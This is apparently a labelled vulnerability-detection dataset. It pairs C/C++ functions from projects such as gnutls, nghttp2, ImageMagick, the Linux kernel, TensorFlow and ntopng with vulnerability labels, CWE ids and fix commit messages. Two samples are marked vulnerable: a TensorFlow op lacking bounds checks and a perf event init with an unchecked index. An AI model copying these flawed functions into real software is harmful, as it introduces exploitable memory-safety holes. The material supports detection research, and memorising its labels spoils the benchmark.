cdk_pk_to_fingerprint(cdk_pubkey_t pk, byte * fprbuf, size_t fprbuflen, size_t * r_nout) { size_t key_fprlen; cdk_error_t err; if (!pk) return CDK_Inv_Value; if (pk->version < 4) key_fprlen = 16; else key_fprlen = 20; /* Only return the required buffer size for the fingerprint. */ if (!fprbuf && !fprbuflen && r_nout) { *r_nout = key_fprlen; return 0; } if (!fprbuf || key_fprlen > fprbuflen) return CDK_Too_Short; err = cdk_pk_get_fingerprint(pk, fprbuf); if (r_nout) *r_nout = key_fprlen; return err; }
0
[ "CWE-119" ]
gnutls
5140422e0d7319a8e2fe07f02cbcafc4d6538732
339,308,311,876,024,700,000,000,000,000,000,000,000
29
opencdk: cdk_pk_get_keyid: fix stack overflow Issue found using oss-fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=340 Signed-off-by: Nikos Mavrogiannopoulos <[email protected]>
int on_header_callback2(nghttp2_session *session, const nghttp2_frame *frame, nghttp2_rcbuf *name, nghttp2_rcbuf *value, uint8_t flags, void *user_data) { auto hd = static_cast<Http2Handler *>(user_data); auto namebuf = nghttp2_rcbuf_get_buf(name); auto valuebuf = nghttp2_rcbuf_get_buf(value); if (hd->get_config()->verbose) { print_session_id(hd->session_id()); verbose_on_header_callback(session, frame, namebuf.base, namebuf.len, valuebuf.base, valuebuf.len, flags, user_data); } if (frame->hd.type != NGHTTP2_HEADERS || frame->headers.cat != NGHTTP2_HCAT_REQUEST) { return 0; } auto stream = hd->get_stream(frame->hd.stream_id); if (!stream) { return 0; } if (stream->header_buffer_size + namebuf.len + valuebuf.len > 64_k) { hd->submit_rst_stream(stream, NGHTTP2_INTERNAL_ERROR); return 0; } stream->header_buffer_size += namebuf.len + valuebuf.len; auto token = http2::lookup_token(namebuf.base, namebuf.len); auto &header = stream->header; switch (token) { case http2::HD__METHOD: header.method = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.method = value; nghttp2_rcbuf_incref(value); break; case http2::HD__SCHEME: header.scheme = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.scheme = value; nghttp2_rcbuf_incref(value); break; case http2::HD__AUTHORITY: header.authority = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.authority = value; nghttp2_rcbuf_incref(value); break; case http2::HD_HOST: header.host = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.host = value; nghttp2_rcbuf_incref(value); break; case http2::HD__PATH: header.path = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.path = value; nghttp2_rcbuf_incref(value); break; case http2::HD_IF_MODIFIED_SINCE: header.ims = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.ims = value; nghttp2_rcbuf_incref(value); break; case http2::HD_EXPECT: header.expect = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.expect = value; nghttp2_rcbuf_incref(value); break; } return 0; }
0
[]
nghttp2
95efb3e19d174354ca50c65d5d7227d92bcd60e1
242,651,159,111,661,400,000,000,000,000,000,000,000
73
Don't read too greedily
MagickPrivate int XCheckDefineCursor(Display *display,Window window, Cursor cursor) { (void) LogMagickEvent(TraceEvent,GetMagickModule(),"..."); assert(display != (Display *) NULL); if (window == XRootWindow(display,XDefaultScreen(display))) return(0); return(XDefineCursor(display,window,cursor)); }
0
[]
ImageMagick
f391a5f4554fe47eb56d6277ac32d1f698572f0e
48,489,802,761,512,155,000,000,000,000,000,000,000
9
https://github.com/ImageMagick/ImageMagick/issues/1531
static void brcmf_deinit_priv_mem(struct brcmf_cfg80211_info *cfg) { kfree(cfg->conf); cfg->conf = NULL; kfree(cfg->extra_buf); cfg->extra_buf = NULL; kfree(cfg->wowl.nd); cfg->wowl.nd = NULL; kfree(cfg->wowl.nd_info); cfg->wowl.nd_info = NULL; kfree(cfg->escan_info.escan_buf); cfg->escan_info.escan_buf = NULL; }
0
[ "CWE-119", "CWE-703" ]
linux
ded89912156b1a47d940a0c954c43afbabd0c42c
156,591,215,361,512,690,000,000,000,000,000,000,000
13
brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() User-space can choose to omit NL80211_ATTR_SSID and only provide raw IE TLV data. When doing so it can provide SSID IE with length exceeding the allowed size. The driver further processes this IE copying it into a local variable without checking the length. Hence stack can be corrupted and used as exploit. Cc: [email protected] # v4.7 Reported-by: Daxing Guo <[email protected]> Reviewed-by: Hante Meuleman <[email protected]> Reviewed-by: Pieter-Paul Giesberts <[email protected]> Reviewed-by: Franky Lin <[email protected]> Signed-off-by: Arend van Spriel <[email protected]> Signed-off-by: Kalle Valo <[email protected]>
struct nfs_server *nfs4_create_referral_server(struct fs_context *fc) { struct nfs_fs_context *ctx = nfs_fc2context(fc); struct nfs_client *parent_client; struct nfs_server *server, *parent_server; bool auth_probe; int error; server = nfs_alloc_server(); if (!server) return ERR_PTR(-ENOMEM); parent_server = NFS_SB(ctx->clone_data.sb); parent_client = parent_server->nfs_client; server->cred = get_cred(parent_server->cred); /* Initialise the client representation from the parent server */ nfs_server_copy_userdata(server, parent_server); /* Get a client representation */ #if IS_ENABLED(CONFIG_SUNRPC_XPRT_RDMA) rpc_set_port(&ctx->nfs_server.address, NFS_RDMA_PORT); error = nfs4_set_client(server, ctx->nfs_server.hostname, &ctx->nfs_server.address, ctx->nfs_server.addrlen, parent_client->cl_ipaddr, XPRT_TRANSPORT_RDMA, parent_server->client->cl_timeout, parent_client->cl_mvops->minor_version, parent_client->cl_nconnect, parent_client->cl_net); if (!error) goto init_server; #endif /* IS_ENABLED(CONFIG_SUNRPC_XPRT_RDMA) */ rpc_set_port(&ctx->nfs_server.address, NFS_PORT); error = nfs4_set_client(server, ctx->nfs_server.hostname, &ctx->nfs_server.address, ctx->nfs_server.addrlen, parent_client->cl_ipaddr, XPRT_TRANSPORT_TCP, parent_server->client->cl_timeout, parent_client->cl_mvops->minor_version, parent_client->cl_nconnect, parent_client->cl_net); if (error < 0) goto error; #if IS_ENABLED(CONFIG_SUNRPC_XPRT_RDMA) init_server: #endif error = nfs_init_server_rpcclient(server, parent_server->client->cl_timeout, ctx->selected_flavor); if (error < 0) goto error; auth_probe = parent_server->auth_info.flavor_len < 1; error = nfs4_server_common_setup(server, ctx->mntfh, auth_probe); if (error < 0) goto error; return server; error: nfs_free_server(server); return ERR_PTR(error); }
0
[ "CWE-703" ]
linux
dd99e9f98fbf423ff6d365b37a98e8879170f17c
220,975,585,161,177,720,000,000,000,000,000,000,000
71
NFSv4: Initialise connection to the server in nfs4_alloc_client() Set up the connection to the NFSv4 server in nfs4_alloc_client(), before we've added the struct nfs_client to the net-namespace's nfs_client_list so that a downed server won't cause other mounts to hang in the trunking detection code. Reported-by: Michael Wakabayashi <[email protected]> Fixes: 5c6e5b60aae4 ("NFS: Fix an Oops in the pNFS files and flexfiles connection setup to the DS") Signed-off-by: Trond Myklebust <[email protected]>
static char *TranslateEvent(const char *module,const char *function, const size_t line,const char *domain,const char *event) { char *text; double elapsed_time, user_time; ExceptionInfo *exception; LogInfo *log_info; register char *q; register const char *p; size_t extent; time_t seconds; exception=AcquireExceptionInfo(); log_info=(LogInfo *) GetLogInfo("*",exception); exception=DestroyExceptionInfo(exception); seconds=time((time_t *) NULL); elapsed_time=GetElapsedTime(&log_info->timer); user_time=GetUserTime(&log_info->timer); text=AcquireString(event); if (log_info->format == (char *) NULL) return(text); extent=strlen(event)+MagickPathExtent; if (LocaleCompare(log_info->format,"xml") == 0) { char timestamp[MagickPathExtent]; /* Translate event in "XML" format. */ (void) FormatMagickTime(seconds,extent,timestamp); (void) FormatLocaleString(text,extent, "<entry>\n" " <timestamp>%s</timestamp>\n" " <elapsed-time>%lu:%02lu.%03lu</elapsed-time>\n" " <user-time>%0.3f</user-time>\n" " <process-id>%.20g</process-id>\n" " <thread-id>%.20g</thread-id>\n" " <module>%s</module>\n" " <function>%s</function>\n" " <line>%.20g</line>\n" " <domain>%s</domain>\n" " <event>%s</event>\n" "</entry>",timestamp,(unsigned long) (elapsed_time/60.0), (unsigned long) floor(fmod(elapsed_time,60.0)),(unsigned long) (1000.0*(elapsed_time-floor(elapsed_time))+0.5),user_time, (double) getpid(),(double) GetMagickThreadSignature(),module,function, (double) line,domain,event); return(text); } /* Translate event in "human readable" format. */ q=text; for (p=log_info->format; *p != '\0'; p++) { *q='\0'; if ((size_t) (q-text+MagickPathExtent) >= extent) { extent+=MagickPathExtent; text=(char *) ResizeQuantumMemory(text,extent+MagickPathExtent, sizeof(*text)); if (text == (char *) NULL) return((char *) NULL); q=text+strlen(text); } /* The format of the log is defined by embedding special format characters: %c client name %d domain %e event %f function %g generation %l line %m module %n log name %p process id %r real CPU time %t wall clock time %u user CPU time %v version %% percent sign \n newline \r carriage return */ if ((*p == '\\') && (*(p+1) == 'r')) { *q++='\r'; p++; continue; } if ((*p == '\\') && (*(p+1) == 'n')) { *q++='\n'; p++; continue; } if (*p != '%') { *q++=(*p); continue; } p++; switch (*p) { case 'c': { q+=CopyMagickString(q,GetClientName(),extent); break; } case 'd': { q+=CopyMagickString(q,domain,extent); break; } case 'e': { q+=CopyMagickString(q,event,extent); break; } case 'f': { q+=CopyMagickString(q,function,extent); break; } case 'g': { if (log_info->generations == 0) { (void) CopyMagickString(q,"0",extent); q++; break; } q+=FormatLocaleString(q,extent,"%.20g",(double) (log_info->generation % log_info->generations)); break; } case 'l': { q+=FormatLocaleString(q,extent,"%.20g",(double) line); break; } case 'm': { register const char *r; for (r=module+strlen(module)-1; r > module; r--) if (*r == *DirectorySeparator) { r++; break; } q+=CopyMagickString(q,r,extent); break; } case 'n': { q+=CopyMagickString(q,GetLogName(),extent); break; } case 'p': { q+=FormatLocaleString(q,extent,"%.20g",(double) getpid()); break; } case 'r': { q+=FormatLocaleString(q,extent,"%lu:%02lu.%03lu",(unsigned long) (elapsed_time/60.0),(unsigned long) floor(fmod(elapsed_time,60.0)), (unsigned long) (1000.0*(elapsed_time-floor(elapsed_time))+0.5)); break; } case 't': { q+=FormatMagickTime(seconds,extent,q); break; } case 'u': { q+=FormatLocaleString(q,extent,"%0.3fu",user_time); break; } case 'v': { q+=CopyMagickString(q,MagickLibVersionText,extent); break; } case '%': { *q++=(*p); break; } default: { *q++='%'; *q++=(*p); break; } } } *q='\0'; return(text); }
0
[ "CWE-476" ]
ImageMagick
107ce8577e818cf4801e5a59641cb769d645cc95
159,992,352,984,492,450,000,000,000,000,000,000,000
221
https://github.com/ImageMagick/ImageMagick/issues/1224
void decode(bufferlist::iterator& bl) { __u8 struct_v; ::decode(struct_v, bl); ::decode(secret_id, bl); ::decode(blob, bl); }
0
[ "CWE-287", "CWE-284" ]
ceph
5ead97120e07054d80623dada90a5cc764c28468
11,970,075,804,419,067,000,000,000,000,000,000,000
6
auth/cephx: add authorizer challenge Allow the accepting side of a connection to reject an initial authorizer with a random challenge. The connecting side then has to respond with an updated authorizer proving they are able to decrypt the service's challenge and that the new authorizer was produced for this specific connection instance. The accepting side requires this challenge and response unconditionally if the client side advertises they have the feature bit. Servers wishing to require this improved level of authentication simply have to require the appropriate feature. Signed-off-by: Sage Weil <[email protected]> (cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b) # Conflicts: # src/auth/Auth.h # src/auth/cephx/CephxProtocol.cc # src/auth/cephx/CephxProtocol.h # src/auth/none/AuthNoneProtocol.h # src/msg/Dispatcher.h # src/msg/async/AsyncConnection.cc - const_iterator - ::decode vs decode - AsyncConnection ctor arg noise - get_random_bytes(), not cct->random()
void Compute(OpKernelContext* const context) override { // node_id_range const Tensor* node_id_range_t; OP_REQUIRES_OK(context, context->input("node_id_range", &node_id_range_t)); OP_REQUIRES( context, node_id_range_t->NumElements() == 2, errors::InvalidArgument("node_id_range argument must have shape [2]")); const auto node_id_range = node_id_range_t->vec<int32>(); const int32_t node_id_first = node_id_range(0); // inclusive const int32_t node_id_last = node_id_range(1); // exclusive const Tensor* stats_summary_t; OP_REQUIRES_OK(context, context->input("stats_summary", &stats_summary_t)); OP_REQUIRES( context, stats_summary_t->shape().dims() == 4, errors::InvalidArgument("stats_summary argument must have rank 4")); TTypes<float, 4>::ConstTensor stats_summary = stats_summary_t->tensor<float, 4>(); const int32_t feature_dims = stats_summary_t->dim_size(1); // The last bucket is for default/missing value. const int32_t num_buckets = stats_summary_t->dim_size(2) - 1; const int32_t logits_dim = logits_dim_; const int32_t hessian_dim = stats_summary_t->dim_size(3) - logits_dim; DCHECK_GT(hessian_dim, 0); DCHECK_LE(hessian_dim, logits_dim * logits_dim); const Tensor* l1_t; OP_REQUIRES_OK(context, context->input("l1", &l1_t)); OP_REQUIRES(context, l1_t->NumElements() == 1, errors::InvalidArgument("l1 argument must be a scalar")); const auto l1 = l1_t->scalar<float>()(); DCHECK_GE(l1, 0); if (logits_dim_ > 1) { // Multi-class L1 regularization not supported yet. DCHECK_EQ(l1, 0); } const Tensor* l2_t; OP_REQUIRES_OK(context, context->input("l2", &l2_t)); OP_REQUIRES(context, l2_t->NumElements() == 1, errors::InvalidArgument("l2 argument must be a scalar")); const auto l2 = l2_t->scalar<float>()(); DCHECK_GE(l2, 0); const Tensor* tree_complexity_t; OP_REQUIRES_OK(context, context->input("tree_complexity", &tree_complexity_t)); OP_REQUIRES( context, tree_complexity_t->NumElements() == 1, errors::InvalidArgument("tree_complexity argument must be a scalar")); const auto tree_complexity = tree_complexity_t->scalar<float>()(); const Tensor* min_node_weight_t; OP_REQUIRES_OK(context, context->input("min_node_weight", &min_node_weight_t)); OP_REQUIRES( context, min_node_weight_t->NumElements() == 1, errors::InvalidArgument("min_node_weight argument must be a scalar")); const auto min_node_weight = min_node_weight_t->scalar<float>()(); std::vector<int32> output_node_ids; std::vector<float> output_gains; std::vector<int32> output_feature_dimensions; std::vector<int32> output_thresholds; std::vector<Eigen::VectorXf> output_left_node_contribs; std::vector<Eigen::VectorXf> output_right_node_contribs; std::vector<std::string> output_split_types; // TODO(tanzheny) parallelize the computation. // Iterate each node and find the best gain per node. for (int32_t node_id = node_id_first; node_id < node_id_last; ++node_id) { float best_gain = std::numeric_limits<float>::lowest(); int32_t best_bucket = 0; int32_t best_f_dim = 0; string best_split_type; Eigen::VectorXf best_contrib_for_left(logits_dim); Eigen::VectorXf best_contrib_for_right(logits_dim); float parent_gain; // Including default bucket. ConstMatrixMap stats_mat(&stats_summary(node_id, 0, 0, 0), num_buckets + 1, logits_dim + hessian_dim); const Eigen::VectorXf total_grad = stats_mat.leftCols(logits_dim).colwise().sum(); const Eigen::VectorXf total_hess = stats_mat.rightCols(hessian_dim).colwise().sum(); if (total_hess.norm() < min_node_weight) { continue; } Eigen::VectorXf parent_weight(logits_dim); CalculateWeightsAndGains(total_grad, total_hess, l1, l2, &parent_weight, &parent_gain); if (split_type_ == "inequality") { CalculateBestInequalitySplit( stats_summary, node_id, feature_dims, logits_dim, hessian_dim, num_buckets, min_node_weight, l1, l2, &best_gain, &best_bucket, &best_f_dim, &best_split_type, &best_contrib_for_left, &best_contrib_for_right); } else { CalculateBestEqualitySplit( stats_summary, total_grad, total_hess, node_id, feature_dims, logits_dim, hessian_dim, num_buckets, l1, l2, &best_gain, &best_bucket, &best_f_dim, &best_split_type, &best_contrib_for_left, &best_contrib_for_right); } if (best_gain == std::numeric_limits<float>::lowest()) { // Do not add the node if not split if found. continue; } output_node_ids.push_back(node_id); // Remove the parent gain for the parent node. output_gains.push_back(best_gain - parent_gain); output_feature_dimensions.push_back(best_f_dim); // default direction is fixed for dense splits. // TODO(tanzheny) account for default values. output_split_types.push_back(best_split_type); output_thresholds.push_back(best_bucket); output_left_node_contribs.push_back(best_contrib_for_left); output_right_node_contribs.push_back(best_contrib_for_right); } // for node id const int num_nodes = output_node_ids.size(); // output_node_ids Tensor* output_node_ids_t = nullptr; OP_REQUIRES_OK(context, context->allocate_output("node_ids", {num_nodes}, &output_node_ids_t)); auto output_node_ids_vec = output_node_ids_t->vec<int32>(); // output_gains Tensor* output_gains_t; OP_REQUIRES_OK(context, context->allocate_output("gains", {num_nodes}, &output_gains_t)); auto output_gains_vec = output_gains_t->vec<float>(); // output_feature_dimensions Tensor* output_feature_dimension_t; OP_REQUIRES_OK(context, context->allocate_output("feature_dimensions", {num_nodes}, &output_feature_dimension_t)); auto output_feature_dimensions_vec = output_feature_dimension_t->vec<int32>(); // output_thresholds Tensor* output_thresholds_t; OP_REQUIRES_OK(context, context->allocate_output("thresholds", {num_nodes}, &output_thresholds_t)); auto output_thresholds_vec = output_thresholds_t->vec<int32>(); // output_left_node_contribs Tensor* output_left_node_contribs_t; OP_REQUIRES_OK(context, context->allocate_output( "left_node_contribs", {num_nodes, logits_dim}, &output_left_node_contribs_t)); auto output_left_node_contribs_matrix = output_left_node_contribs_t->matrix<float>(); // output_right_node_contribs Tensor* output_right_node_contribs_t; OP_REQUIRES_OK(context, context->allocate_output( "right_node_contribs", {num_nodes, logits_dim}, &output_right_node_contribs_t)); auto output_right_node_contribs_matrix = output_right_node_contribs_t->matrix<float>(); // split type Tensor* output_split_types_t; OP_REQUIRES_OK( context, context->allocate_output("split_with_default_directions", {num_nodes}, &output_split_types_t)); auto output_split_types_vec = output_split_types_t->vec<tstring>(); // Sets output tensors from vectors. for (int i = 0; i < num_nodes; ++i) { output_node_ids_vec(i) = output_node_ids[i]; // Adjust the gains to penalize by tree complexity. output_gains_vec(i) = output_gains[i] - tree_complexity; output_feature_dimensions_vec(i) = output_feature_dimensions[i]; output_thresholds_vec(i) = output_thresholds[i]; for (int j = 0; j < logits_dim; ++j) { output_left_node_contribs_matrix(i, j) = output_left_node_contribs[i][j]; output_right_node_contribs_matrix(i, j) = output_right_node_contribs[i][j]; } output_split_types_vec(i) = output_split_types[i]; } }
1
[ "CWE-476", "CWE-369" ]
tensorflow
5c8c9a8bfe750f9743d0c859bae112060b216f5c
7,202,424,637,991,012,000,000,000,000,000,000,000
188
Fixing security fixes in boosted trees ops PiperOrigin-RevId: 405669548 Change-Id: Iae224d240d1779bcc02405c2fff99785644fbd0d
TEST(BoolTest, FormatBool) { EXPECT_EQ("true", format("{}", true)); EXPECT_EQ("false", format("{}", false)); EXPECT_EQ("1", format("{:d}", true)); EXPECT_EQ("true ", format("{:5}", true)); EXPECT_EQ(L"true", format(L"{}", true)); }
0
[ "CWE-134", "CWE-119", "CWE-787" ]
fmt
8cf30aa2be256eba07bb1cefb998c52326e846e7
38,423,163,649,420,490,000,000,000,000,000,000,000
7
Fix segfault on complex pointer formatting (#642)
static void nfs4_destroy_server(struct nfs_server *server) { LIST_HEAD(freeme); nfs_server_return_all_delegations(server); unset_pnfs_layoutdriver(server); nfs4_purge_state_owners(server, &freeme); nfs4_free_state_owners(&freeme); }
0
[ "CWE-703" ]
linux
dd99e9f98fbf423ff6d365b37a98e8879170f17c
308,258,045,588,436,040,000,000,000,000,000,000,000
9
NFSv4: Initialise connection to the server in nfs4_alloc_client() Set up the connection to the NFSv4 server in nfs4_alloc_client(), before we've added the struct nfs_client to the net-namespace's nfs_client_list so that a downed server won't cause other mounts to hang in the trunking detection code. Reported-by: Michael Wakabayashi <[email protected]> Fixes: 5c6e5b60aae4 ("NFS: Fix an Oops in the pNFS files and flexfiles connection setup to the DS") Signed-off-by: Trond Myklebust <[email protected]>
static int ntop_dump_file(lua_State* vm) { char *fname; FILE *fd; struct mg_connection *conn; ntop->getTrace()->traceEvent(TRACE_DEBUG, "%s() called", __FUNCTION__); lua_getglobal(vm, CONST_HTTP_CONN); if((conn = (struct mg_connection*)lua_touserdata(vm, lua_gettop(vm))) == NULL) { ntop->getTrace()->traceEvent(TRACE_ERROR, "INTERNAL ERROR: null HTTP connection"); return(CONST_LUA_ERROR); } if(ntop_lua_check(vm, __FUNCTION__, 1, LUA_TSTRING)) return(CONST_LUA_ERROR); if((fname = (char*)lua_tostring(vm, 1)) == NULL) return(CONST_LUA_PARAM_ERROR); ntop->fixPath(fname); if((fd = fopen(fname, "r")) != NULL) { char tmp[1024]; ntop->getTrace()->traceEvent(TRACE_INFO, "[HTTP] Serving file %s", fname); while((fgets(tmp, sizeof(tmp)-256 /* To make sure we have room for replacements */, fd)) != NULL) { for(int i=0; string_to_replace[i].key != NULL; i++) Utils::replacestr(tmp, string_to_replace[i].key, string_to_replace[i].val); mg_printf(conn, "%s", tmp); } fclose(fd); return(CONST_LUA_OK); } else { ntop->getTrace()->traceEvent(TRACE_INFO, "Unable to read file %s", fname); return(CONST_LUA_ERROR); } }
0
[ "CWE-476" ]
ntopng
01f47e04fd7c8d54399c9e465f823f0017069f8f
34,529,004,953,682,386,000,000,000,000,000,000,000
36
Security fix: prevents empty host from being used
static void session_unsub(broker_t *b, pn_session_t *ssn) { pn_connection_t *c = pn_session_connection(ssn); pn_link_t *l; for (l = pn_link_head(c, 0); l != NULL; l = pn_link_next(l, 0)) { if (pn_link_session(l) == ssn) link_unsub(b, l); }
0
[]
qpid-proton
159fac1f90d9b1ace1138d510176e7a5da54e9e9
277,542,837,520,524,200,000,000,000,000,000,000,000
8
PROTON-2014: [c] Fix example broker to warn when it fails to set up ssl - Also make send-ssl tell you the remote peer
write_card32 (FILE *ofp, L_CARD32 c) { putc ((int) ((c >> 24) & 0xff), ofp); putc ((int) ((c >> 16) & 0xff), ofp); putc ((int) ((c >> 8) & 0xff), ofp); putc ((int) ((c) & 0xff), ofp); }
0
[ "CWE-787" ]
gimp
0b35f6a082a0b3c372c568ea6bde39a4796acde2
31,709,675,318,414,318,000,000,000,000,000,000,000
8
Bug 687392 - Memory corruption vulnerability when reading XWD files Applied and enhanced patch from andres which makes file-xwd detect this kind of file corruption and abort loading with an error message.
int sqlite3ExprContainsSubquery(Expr *p){ Walker w; w.eCode = 1; w.xExprCallback = sqlite3ExprWalkNoop; w.xSelectCallback = sqlite3SelectWalkFail; #ifdef SQLITE_DEBUG w.xSelectCallback2 = sqlite3SelectWalkAssert2; #endif sqlite3WalkExpr(&w, p); return w.eCode==0; }
0
[ "CWE-476" ]
sqlite
57f7ece78410a8aae86aa4625fb7556897db384c
184,046,857,421,702,300,000,000,000,000,000,000,000
11
Fix a problem that comes up when using generated columns that evaluate to a constant in an index and then making use of that index in a join. FossilOrigin-Name: 8b12e95fec7ce6e0de82a04ca3dfcf1a8e62e233b7382aa28a8a9be6e862b1af
static int selinux_binder_set_context_mgr(struct task_struct *mgr) { return avc_has_perm(&selinux_state, current_sid(), task_sid_binder(mgr), SECCLASS_BINDER, BINDER__SET_CONTEXT_MGR, NULL); }
0
[ "CWE-416" ]
linux
a3727a8bac0a9e77c70820655fd8715523ba3db7
62,195,760,426,971,520,000,000,000,000,000,000,000
6
selinux,smack: fix subjective/objective credential use mixups Jann Horn reported a problem with commit eb1231f73c4d ("selinux: clarify task subjective and objective credentials") where some LSM hooks were attempting to access the subjective credentials of a task other than the current task. Generally speaking, it is not safe to access another task's subjective credentials and doing so can cause a number of problems. Further, while looking into the problem, I realized that Smack was suffering from a similar problem brought about by a similar commit 1fb057dcde11 ("smack: differentiate between subjective and objective task credentials"). This patch addresses this problem by restoring the use of the task's objective credentials in those cases where the task is other than the current executing task. Not only does this resolve the problem reported by Jann, it is arguably the correct thing to do in these cases. Cc: [email protected] Fixes: eb1231f73c4d ("selinux: clarify task subjective and objective credentials") Fixes: 1fb057dcde11 ("smack: differentiate between subjective and objective task credentials") Reported-by: Jann Horn <[email protected]> Acked-by: Eric W. Biederman <[email protected]> Acked-by: Casey Schaufler <[email protected]> Signed-off-by: Paul Moore <[email protected]>
void expectNoProtocol() { expectHandshakeSuccess(); EXPECT_EQ(client->nextProtoLength, 0); EXPECT_EQ(server->nextProtoLength, 0); EXPECT_EQ(client->nextProto, nullptr); EXPECT_EQ(server->nextProto, nullptr); }
0
[ "CWE-125" ]
folly
c321eb588909646c15aefde035fd3133ba32cdee
4,775,311,824,206,311,000,000,000,000,000,000,000
7
Handle close_notify as standard writeErr in AsyncSSLSocket. Summary: Fixes CVE-2019-11934 Reviewed By: mingtaoy Differential Revision: D18020613 fbshipit-source-id: db82bb250e53f0d225f1280bd67bc74abd417836
static bool cmd_ibm_sense_condition(IDEState *s, uint8_t cmd) { switch (s->feature) { case 0x01: /* sense temperature in device */ s->nsector = 0x50; /* +20 C */ break; default: ide_abort_command(s); return true; } return true; }
0
[ "CWE-189" ]
qemu
940973ae0b45c9b6817bab8e4cf4df99a9ef83d7
158,488,838,950,567,770,000,000,000,000,000,000,000
13
ide: Correct improper smart self test counter reset in ide core. The SMART self test counter was incorrectly being reset to zero, not 1. This had the effect that on every 21st SMART EXECUTE OFFLINE: * We would write off the beginning of a dynamically allocated buffer * We forgot the SMART history Fix this. Signed-off-by: Benoit Canet <[email protected]> Message-id: [email protected] Reviewed-by: Markus Armbruster <[email protected]> Cc: [email protected] Acked-by: Kevin Wolf <[email protected]> [PMM: tweaked commit message as per suggestions from Markus] Signed-off-by: Peter Maydell <[email protected]>
static void nalm_dump(FILE * trace, char *data, u32 data_size) { GF_BitStream *bs; Bool rle, large_size; u32 entry_count; if (!data) { gf_fprintf(trace, "<NALUMap rle=\"\" large_size=\"\">\n"); gf_fprintf(trace, "<NALUMapEntry NALU_startNumber=\"\" groupID=\"\"/>\n"); gf_fprintf(trace, "</NALUMap>\n"); return; } bs = gf_bs_new(data, data_size, GF_BITSTREAM_READ); gf_bs_read_int(bs, 6); large_size = gf_bs_read_int(bs, 1); rle = gf_bs_read_int(bs, 1); entry_count = gf_bs_read_int(bs, large_size ? 16 : 8); gf_fprintf(trace, "<NALUMap rle=\"%d\" large_size=\"%d\">\n", rle, large_size); while (entry_count) { u32 ID; gf_fprintf(trace, "<NALUMapEntry "); if (rle) { u32 start_num = gf_bs_read_int(bs, large_size ? 16 : 8); gf_fprintf(trace, "NALU_startNumber=\"%d\" ", start_num); } ID = gf_bs_read_u16(bs); gf_fprintf(trace, "groupID=\"%d\"/>\n", ID); entry_count--; } gf_bs_del(bs); gf_fprintf(trace, "</NALUMap>\n"); return; }
0
[ "CWE-787" ]
gpac
ea1eca00fd92fa17f0e25ac25652622924a9a6a0
270,332,910,197,558,770,000,000,000,000,000,000,000
36
fixed #2138
xmlSchemaAddType(xmlSchemaParserCtxtPtr ctxt, xmlSchemaPtr schema, xmlSchemaTypeType type, const xmlChar * name, const xmlChar * nsName, xmlNodePtr node, int topLevel) { xmlSchemaTypePtr ret = NULL; if ((ctxt == NULL) || (schema == NULL)) return (NULL); ret = (xmlSchemaTypePtr) xmlMalloc(sizeof(xmlSchemaType)); if (ret == NULL) { xmlSchemaPErrMemory(ctxt, "allocating type", NULL); return (NULL); } memset(ret, 0, sizeof(xmlSchemaType)); ret->type = type; ret->name = name; ret->targetNamespace = nsName; ret->node = node; if (topLevel) { if (ctxt->isRedefine) { ctxt->redef = xmlSchemaAddRedef(ctxt, ctxt->redefined, ret, name, nsName); if (ctxt->redef == NULL) { xmlFree(ret); return(NULL); } ctxt->redefCounter = 0; } WXS_ADD_GLOBAL(ctxt, ret); } else WXS_ADD_LOCAL(ctxt, ret); WXS_ADD_PENDING(ctxt, ret); return (ret); }
0
[ "CWE-134" ]
libxml2
4472c3a5a5b516aaf59b89be602fbce52756c3e9
125,168,708,111,798,160,000,000,000,000,000,000,000
36
Fix some format string warnings with possible format string vulnerability For https://bugzilla.gnome.org/show_bug.cgi?id=761029 Decorate every method in libxml2 with the appropriate LIBXML_ATTR_FORMAT(fmt,args) macro and add some cleanups following the reports.
void dw_spi_remove_host(struct dw_spi *dws) { dw_spi_debugfs_remove(dws); if (dws->dma_ops && dws->dma_ops->dma_exit) dws->dma_ops->dma_exit(dws); spi_shutdown_chip(dws); free_irq(dws->irq, dws->master); }
0
[ "CWE-662" ]
linux
19b61392c5a852b4e8a0bf35aecb969983c5932d
212,238,814,548,671,270,000,000,000,000,000,000,000
11
spi: spi-dw: Add lock protect dw_spi rx/tx to prevent concurrent calls dw_spi_irq() and dw_spi_transfer_one concurrent calls. I find a panic in dw_writer(): txw = *(u8 *)(dws->tx), when dw->tx==null, dw->len==4, and dw->tx_end==1. When tpm driver's message overtime dw_spi_irq() and dw_spi_transfer_one may concurrent visit dw_spi, so I think dw_spi structure lack of protection. Otherwise dw_spi_transfer_one set dw rx/tx buffer and then open irq, store dw rx/tx instructions and other cores handle irq load dw rx/tx instructions may out of order. [ 1025.321302] Call trace: ... [ 1025.321319] __crash_kexec+0x98/0x148 [ 1025.321323] panic+0x17c/0x314 [ 1025.321329] die+0x29c/0x2e8 [ 1025.321334] die_kernel_fault+0x68/0x78 [ 1025.321337] __do_kernel_fault+0x90/0xb0 [ 1025.321346] do_page_fault+0x88/0x500 [ 1025.321347] do_translation_fault+0xa8/0xb8 [ 1025.321349] do_mem_abort+0x68/0x118 [ 1025.321351] el1_da+0x20/0x8c [ 1025.321362] dw_writer+0xc8/0xd0 [ 1025.321364] interrupt_transfer+0x60/0x110 [ 1025.321365] dw_spi_irq+0x48/0x70 ... Signed-off-by: wuxu.wu <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Mark Brown <[email protected]>
static int perf_swevent_init(struct perf_event *event) { int event_id = event->attr.config; if (event->attr.type != PERF_TYPE_SOFTWARE) return -ENOENT; /* * no branch sampling for software events */ if (has_branch_stack(event)) return -EOPNOTSUPP; switch (event_id) { case PERF_COUNT_SW_CPU_CLOCK: case PERF_COUNT_SW_TASK_CLOCK: return -ENOENT; default: break; } if (event_id >= PERF_COUNT_SW_MAX) return -ENOENT; if (!event->parent) { int err; err = swevent_hlist_get(event); if (err) return err; static_key_slow_inc(&perf_swevent_enabled[event_id]); event->destroy = sw_perf_event_destroy; } return 0; }
1
[ "CWE-703", "CWE-189" ]
linux
8176cced706b5e5d15887584150764894e94e02f
210,222,523,471,394,240,000,000,000,000,000,000,000
38
